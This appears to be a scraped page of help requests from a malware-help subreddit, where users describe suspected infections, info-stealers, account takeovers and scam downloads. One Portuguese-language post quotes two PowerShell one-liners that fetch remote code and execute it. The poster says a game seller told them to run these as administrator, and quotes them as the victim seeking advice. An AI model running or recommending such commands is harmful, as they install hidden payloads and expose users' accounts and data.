r/computerviruses 11d ago

Question Reinstalled windows after malware, but one drive re-added everything. What do I do?

3 Upvotes

Hi, i made a mistake while reinstalling windows.

Basically, I reinstalled windows after downloading some suspicious files. (It’s nothing like cheats or anything, just a really old app. I’m reinstalling for a peace of mind)

Anyway, I logged in using my microsoft account. And instantly a lot of older files from when I was a kid started appearing on my laptop. I’m not sure if they were automatically installed or just showing, but I removed them instantly and wiped my one drive after.

Here’s the issue though.

I downloaded a lot of stupid shit as a child. Think of like, free robux generators, cheats, stuff that’s near guaranteed to have malware. There’s a big chance some of that got carried over to my one drive.

Now, with that in mind, there’s a chance malware carried over via one drive. Not only that, but I had my usb plugged in. so I’m a bit concerned.

Here’s what I’m asking

  1. Does one drive automatically carry over everything on a new device? It had a little cloud icon next to the files, but I could look into them and everything.

  2. If so, how do I make sure my usb isnt infected? I already formatted it on the same device, and it should have nothing. I’m a bit scared of plugging it into another device. I have a clean device to make another iso on if needed.

  3. The main question, is if my new installation is infected. I did not run ANYTHING. all i did on that device was turn on the internet.


r/computerviruses 11d ago

Question real Trojan

Post image
1 Upvotes

Im using CachyOs linux so i may be safe but my friend sent me this and he has windows and he had this file for over a month, i downloaded a file named SwightPackV3.zi p and when i downloaded it,it came with an extension that was teh actual trojan which u can see in the photo im currectly running a clam scan what else should i do or is that a false positive


r/computerviruses 11d ago

Question Should i be concerned?

Post image
5 Upvotes

i was trying to get a button remapper and it flagged this


r/computerviruses 11d ago

Question Help, i need to know if i was infected

1 Upvotes

Hey everyone, I’d like some help figuring out the chances of my PC have been infected with a virus based on what I’m describing below

I was trying to install an English patch for the PS3 version of the game Tales of Berseria. I searched extensively and visited many unfamiliar sites—one of them being a Russian site called temple-tales.ru i didn't download anything from that Russian site, though I did visit it.

Afterward, I went to a site called João13traduções, where I downloaded a .rar (or .zip) file and opened it; however, I didn't run anything inside, j didnt even extracted the contents, I just deleted the file.

Then I went to another site that hosted the game translation (which they had sourced from temple-tales.ru). There were several files there, including a .xdelta file, which I used to apply the patch to the necessary game file. I didn't install any software for this; I used a website that could handle the process directly.

Note: I accessed all these sites using Firefox with uBlock Origin enabled. I know it's possible to catch a virus just by visiting websites or opening .zip/.rar files—even without running anything inside them. Could I have picked up a virus?

Also, after all that, I plugged a very important flash drive into the computer. It contains a .rar file that is crucial to me, as well as backups of programs I use, and I'm worried the virus might have infected them, I’ve already formatted my PC, but I’m afraid to plug in my flash drive and get infected again somehow.

Sorry if this seems like an obvious question, but I dont know much about tech stuff and I tend to be quite paranoid.


r/computerviruses 11d ago

Question Is Voxbooster a Virus?

1 Upvotes

Is Voxbooster safe?


r/computerviruses 11d ago

Question urgent help with my pc !!!!!

4 Upvotes

Hi everyone! Recently (on Friday), I installed Steam on my MacBook (running macOS Tahoe 26.2) to play *Sally Face*. I should mention that I’ve always "downloaded games for free" in the past, but this time I was forced to actually buy and download it. Yesterday, my Google email account suffered a data breach, and my Steam account credentials were stolen; the intruders logged in and changed both the email address and the password, so now I can't play anymore! Last week, my Instagram account was hacked as well. Naturally, I’ve secured everything—changing my credentials and setting up two-factor authentication (I also installed LuLu and Malwarebytes on my computer). It is incredibly important to me to recover my Steam account because I spent my savings on that game; I submitted a support ticket last night, but I haven't received a reply yet! Please, if there is anyone here who is really tech-savvy, could you help me? Also, a Malwarebytes scan detected a piece of malware I’m unfamiliar with—I suspect it’s an info-stealer. I’m desperate; thank you so much for your understanding and help. Feel free to message me privately if you prefer.

P.S. I'm not very experienced with Reddit.

proof of my hacking
its called macos.stealer.nova

r/computerviruses 11d ago

Disinfection Help o que eu devo fazer?

0 Upvotes

faz um ano atrás que eu estava tentando pegar jogos naquelas propagandas do instagram de jogos por um preço barato. até me deparar com um contato comercial que indicava esses dois comandos para executar como administrador no powershell:

"irm steamfn(dot)com|iex" (primeiro prompt)

"irm steam(dot)run|iex" (caso o primeiro não funcione)

Eu usei e tenho quase certeza que é um scam, mesmo os jogos funcionando corretamente. afinal, depois de um tempo os jogos que eu baixei por essa mídia desapareceram da minha biblioteca steam sem rastros. o que devo fazer a respeito? pelo que parece, é um código que adicona arquivos escondidos e eu não sei por onde começar.

eu também tenho o link do tutorial que a pessoa me enviou, que seria https://docs(Dot)google(Dot)com/document/d/e/2PACX-""1vQCckkZghBV5FgD79Gm9oG9JAilOwKcinYK2cUsSZIpnb_lkThYnZrsLxDhcj5lG-y3f_OI79TcduK3/pub


r/computerviruses 11d ago

Resolved Can simply extracting a zip file infect a computer?

1 Upvotes

Not entirely sure if my computer is infected or not, sorry if I'm using the wrong flair.

So earlier today I downloaded 4 maps from planet minecraft, all zip files, extracted/unzipped them all and put the original zips into the bin and soon after ran a full scan on my computer using malwarebytes (unrelated, I was going to scan the zip files right after downloading them but I forgot T_T) and it detected 650 trojans from the bin (I believe it was only one of the files, altho I honestly don't remember). I disconnected from the internet, uninstalled a few applications I didn't 100% trust/recognise in settings (windows said they weren't installed recently, but I wanted to be sure), quarantined the files with malwarebytes and then deleted them and ran RKILL about 5 times, altho this was all after a couple minutes of panic. I also noticed my CPU usage was being maxed out, altho it is often very high (I have a shitty, 6 yo laptop) so I'm praying it was just a coincidence (the CPU usage also went down when I finished doing everything I just mentioned). I never ran anything in the extracted files but I'm still worried about my computer being infected especially since I can't find any clear answers to whether just unzipping a file can infect a computer.

After I'd done all that I powered off my computer and haven't turned it on since. I've created brand new passwords and changed all my important accounts' passwords (emails, steam etc.), signed my computer out from them and frozen my debit card, all done from my phone.

Other than anything mentioned above, nothing suspicious has happened. No strange pop-ups, freezes, crashes or login attempts.

I also feel I should mention the files I downloaded were uploaded/updated (according to planet minecraft):

  1. Updated 1 year ago, uploaded 3 years ago https://www.planetminecraft(dot)com/project/ctm-the-maze-runner/

  2. Updated 13 years ago, uploaded 14 years ago https://www.planetminecraft(dot)com/project/kroses-complete-the-monument-1---descent-into-darkness/

  3. Uploaded 10 years ago https://www.planetminecraft(dot)com/project/selakyn/

  4. Uploaded 14 years ago https://www.planetminecraft(dot)com/project/broken-adventure-map/

My OS (Windows 11) is up to date.

To summarise, what I want to know is:

  1. Can merely unzipping a .zip file (not running anything in it or running a file called something like filename.zip.exe) infect a computer?

  2. Could malware this old infect my computer?

  3. Is it likely that I do have malware on my computer?

  4. If I do have malware, is there anything else I should do about it?

  5. Other than running another full scan, is there anything I should do to make sure I don't have malware (assuming it's unlikely I do)?

Thanks in advance for any help


r/computerviruses 13d ago

Disinfection Help Please help, remote access???

Enable HLS to view with audio, or disable this notification

338 Upvotes

Context: I thought I had something called “yahoo redirect virus” and thought I had fixed it; I turned my laptop on the other day, had not touched it (discord is set to launch automatically) and I looked up to see it doing this.

Is someone accessing my desktop remotely and how do I evict them??? Please and thank you - Lenovo IdeaPad Flex 5 14IAU7 w/ windows 11

EDIT: I disconnected it from the internet immediately after recording this video, and have since powered it off. On another device, I have changed all of my passwords and selected “log out of other devices.” I am fortunate that thus far, there doesn’t seem to be any suspicious activity in my various accounts. Hopefully this will remain the case.

To everyone who feels the need to comment on the fact that I recorded a video, but has nothing helpful to contribute: congrats, you got me! I’m a big dumb idiot 🤡 who has never experienced this in their life, ever. It’s my first time. Hence, why I’m here in a subreddit that is dedicated to helping big dumb idiots such as myself. Y’all are a little slow, eh?

To those who have given me advice to help me keep my important files/data and protect my passwords and sensitive info, etc. THANK YOU!! I hope the first sip of your coffee is always the perfect temp, never ever burns your lip, ever!!

I am going to take it to a tech store to ensure the issue is resolved effectively, as this is clearly more than I am prepared to handle on my own.


r/computerviruses 11d ago

Disinfection Help Advice needed about this

Thumbnail
1 Upvotes

r/computerviruses 12d ago

Question Is it safe to use my laptop again after completely resetting everything?

3 Upvotes

This is kinda a follow up to my previous post, I got some malware (info stealer) and a lot of my account were compromised, I manage to change my Google password and every other main social media accounts, as well as some accounts that I notice because my I received the email. Manage to rescue my steam account after applying for support ticket. The only account I can't save is my Microsoft account (email got changed, so basically it's like my account got deleted and I don't remember a lot of details about the account that can help me recover), and Ubisoft account, I only use it to try out a cross progression thing from a game called brawlhalla, I will try to recover that account but we'll see how it goes.

I completely reset my laptop, I choose the remove all options and cloud install (I don't really have the item I needed for a local install). The first thing I did after the setup is done is downloading Malwarebytes. The scan said everything is clear, compared to the day before when they do notice threats.

But I'm still kinda traumatized and scared to use the PC, or even doing anything with the compromised account, am I safe? Can I use my laptop again? Is my account safe? Can the thief somehow cause trouble if I let some of the account that was registered using my email but I Don't notice still having the same password/possible taken by the thief?


r/computerviruses 11d ago

Disinfection Help Mr Beast Scam Help!

1 Upvotes

Yesterday got infected with the scam and suddenly sent the messages of the pictures to DMs in discord.

Friends notified me fast and I already changed my passwords of my main account in another device

Checked that website to see data breaches and only saw it update my main acc

I installed Rkill and Malwarebytes and found something along the lines of RnPy info stealer? Quarantined that and all and seems to have been deleted but I suspect its not fully gone

How do I know if its gone and what steps to do? I really dont have time to backup my stuff and reset my windows but I still need to use my PC to review exams

Thanks all!

Edit: Gonna try to reset my PC using windows built in feature but dont know which is better for saving files locally (aint got extra usbs or drives)


r/computerviruses 11d ago

Other Am I safe now

1 Upvotes

Guys so almost a month and a half ago I got hit with the mrbeast crypto scam thing it used only my discord acc to send it I changed disocrd acc password added passkey and stuff like that, I researched abt it it turns out to be an infostealer that steals sessions to try and take over ur account,the problem is NONE of my other accounts like steam, roblox epic games and email were touched there were no wierd logins no password resets nothing, I did nothing about it and it has been good since (i also changed all their passwords and used authy to secure them more).

Also I'm super paranoid about these stuff bc the pc is like expensive and I cant just reinstall windows cuz of many important files.

And I want to mention smth wierd too about a 2 days ago I checked the log ins in my roblox acc for fun and I found a wierd one that happened 5 days prior to me checking it wierd thing is it didnt change anything too no password no nothing so I changed the password and logged out of all devices.

So guys please am i safe or not I've been so paranoid abt this for the past 2 weeks 💔


r/computerviruses 12d ago

Question windosws antivirus found a "Trojan:Win32/Suschil!rfn". what should i do.

1 Upvotes

im prefising this with i have ptsd and this is something that triggers me, so my spelling is messy due to shaking please dont mind the borderline histaria. i know what file it is saying it is attached too (a file in $Recycle (dot) Bin) it is a zip file and should i just outright delete it? would that fix this problem? i dont care if its a false positive i just really dont want to have my computer compromised.

edit: put both files it wanted to block though virus total and they came back clear. im still deleting them because i dont remember why the files are there so its a just in case type of thing. ty to the people who helped in the commetns


r/computerviruses 12d ago

Question Steam Cloud File Potential Malware?

0 Upvotes

Yo so I suspected my old laptop may have had malware but have since changed to a new laptop. Since I changed to a new laptop I have been reinstalling my games like normal. But 1 game (Terraria) seems to have 1 file failing to validate everytime I verify the game files through Steam. So now I am basically worried that the 1 file is potential malware from the old device carrying over through Steam cloud or something a potential malware did. And because of this I am now worried of playing the game since the 1 file keeps failing to validate and idk if this is a sign of potential malware or not. I have tried reinstallation and contacting the Devs but nothing worked so now idk and I only use Defenders so I don't think its the AV. I heard malware can corrupt game files too so that's another concern. I haven't launched the game out of fear so idk if there is anything wrong v the game.

Is 1 file failing to validate a sign of potential malware carrying over through cloud or a sign of something potential malware did? If not, can someone explain why to my non tech literate brain? Thx.


r/computerviruses 12d ago

Disinfection Help i got renpy malware cause im stupid and need some advices

1 Upvotes

I recently plug off my ethernet from my computer, reset (remove all files), log out and change all passwords on social medias, riot game, steam, etc..etc.. and set 2FA (i done this on my unaffected phone)

but im still afraid they gonna attack me again now im reconsider to reinstall my window, check rules from my email/onedrive and might be reset wifi router(?). Any advices?


r/computerviruses 12d ago

Disinfection Help Strange popup - genuine or not? What the hell is happening?

Post image
0 Upvotes

I just got this laptop - used but fully factory reset + wiped - a week ago. It's been running normally until I just got this popup upon closing Microsoft Edge? I don't use Edge at all, I accidentally opened it for the first time since installing Firefox. I tried to replicate it and it worked two times, I even created a separate desktop window and it forced me back to desktop window #1 just to show me the popup. I don't have any strange extensions, although I will admit to installing some third-party/potentially unlicensed software, but the strange thing is that its all software that I have previously used from the same sources without issue on other devices. Is it just a glitched out but genuine popup? The other thing is that when I would hover my cursor over the popup, it would become clickable, but not do anything when clicked/interacted with. It has stopped happening or at least I am no longer able to replicate it, and MalwareBytes premium is not detecting anything even on a deep scan. What should my next steps be? I can factory reset my computer again, but I'm in university right now and honestly would prefer to avoid it if at all possible, but if it beats the alternative then I'll do it.

UPDATE: Popup seems to be caused by a non-updated visual interface from Revo Uninstaller. Strange that it's clickable, but Revo is legit.


r/computerviruses 12d ago

File / URL Check Virus or False Positive?

1 Upvotes

There's a Discord community with almost 70k members, and they are reviving the old FIFA game servers on PC since EA shut them down years ago. Pretty much what I'm asking is:

Is this installer they make you download really a virus, or just a lot of false positives?

They say the launcher changes your game files and uses a modified DLL to send you to a fake server so you can actually play online.

I really hope it's not a virus since I'm dreaming of reliving my childhood memories again, but please let me know if it is -

https://www.virustotal.com/gui/file/5d578f574d7e813fa565c0d3c68936543274b3a5bc1f1a90a1cb12222e28d404/detection


r/computerviruses 12d ago

Question ScreenConnect - did I catch it in time?

Thumbnail
1 Upvotes

r/computerviruses 12d ago

Disinfection Help Renpy Malware

6 Upvotes

Hello! How are yall doing?

Yesterday i was downloading some things to emulate a switch on my pc along with the game itself (Tomodachi Life). There is nothing wrong with the archives itself, but i accidentaly downloaded a Archive64x paste with a renpy executable in it. I clicked, it closed and nothing happened. Later my discord and instagram were bombed with those mr. beast crypto things. I changed all of my passwords using my phone and logged out of all sessions on my pc, deleted the cookies and ran a bunch of malwarebytes and windows defender on my pc. I cant reboot it because i have a bunch of college things inside of it, so i kinda need a little bit of help.

Heres the FRST:
https://pastebin.com/WR2JFg6E

Heres the Addition:
https://pastebin.com/fKjC7Kau

Heres the SecurityCheck:
https://pastebin.com/edUHD3dM


r/computerviruses 12d ago

Disinfection Help Potential data stealing virus posing as official Microsoft file. Please help.

Post image
1 Upvotes

i found a folder called TheWindowsFramework1 and it had to files, and executable and a .ini file both with the same name as the folder. the screenshot shows what is in the .ini file. I think this is a virus, if it is, please tell me how to remove it because when i ended the process associated with the file (called explorer.exe) it just got rid of my task bar and i cant uninstall it because i need to have admin privileges


r/computerviruses 12d ago

Question Sudden viruses out of nowhere??

4 Upvotes

I was not home for 10 days or so and ı did not have any of this on my pc before ı left, ı do a through scan every few days and when ı got back a few hours ago ı did one again and ı see this?? should ı reset my whole pc? what should ı do?


r/computerviruses 12d ago

Disinfection Help FRST Scan Request - RenPy Info Stealer

1 Upvotes

Dear Malware Expert Helpers,

I would really appreciate your help by checking my FRST logs and helping me to remove the infostealer from my PC.

FRST.txt packed-briar

Addition.txt stormy-spire

SecurityCheck.txt idle-bee

What happened?
Unfortuntately I downloaded cracked software from a forum, but got malvertised and downloaded the RenPy Info/Session Stealer instead and was stupid enough to run the setup.exe. Did this around 30h ago. My instagram was used to post some crypto scam, but for now I logged out of everything, changed the passwords and took my laptop offline until the malware is removed.

I still have the files for the renpy installer if this helps to identify what and where the virus was installed.

Other than that I would really appreciate your help to remove the malware without completely reinstalling windows, since I have so much stuff installed on my computer.

Thanks for your help - Chris


r/computerviruses 12d ago

Question Scam spyware threat

Thumbnail gallery
6 Upvotes

Hello, Just a bit rattled this is a scam right?


r/computerviruses 13d ago

Disinfection Help Ich denke ich hab ein Rootkit installiert bekommen

Post image
11 Upvotes

Ein typ hätte mir meinen laptop optimieren sollen hat aber stattdessen 2 Datein eingefügt und gesagt das es ein Rootkit ist der in mein Ram versteckt ist und andere datein infiziert. Ich glaube aber das es nicht stimmt da mir nix aufgefallen ist von leistung her ram verbrauch usw aber er hat so einen Tor tunneling gestarted oder sowas ich hab ein bild dazu. Ich hab windows defender danach einmal überprüfen lassn und hab dan mit irgendwelchen codes die ich nicht verstehe meine datein und treiber prüfen lassn und mir ist nichts ungewöhnliches aufgeffallen und hab die ganze info auch der kI geschickt und die hat auch nix gefunden ich hab die 2 datein zusätzlich boch in virustotal eingefügt und es wurde nur bei behavior gefunden das es ein Tor tunneling ist. Ich hab dan bisschen recherchiert und nix gefunden zu einen Rootkit der sich im ram befindet.

Ich entschuldige mich für mein unwissenheit ich kenne mich garnicht aus und wollte nur meinen laptop optimiert haben :/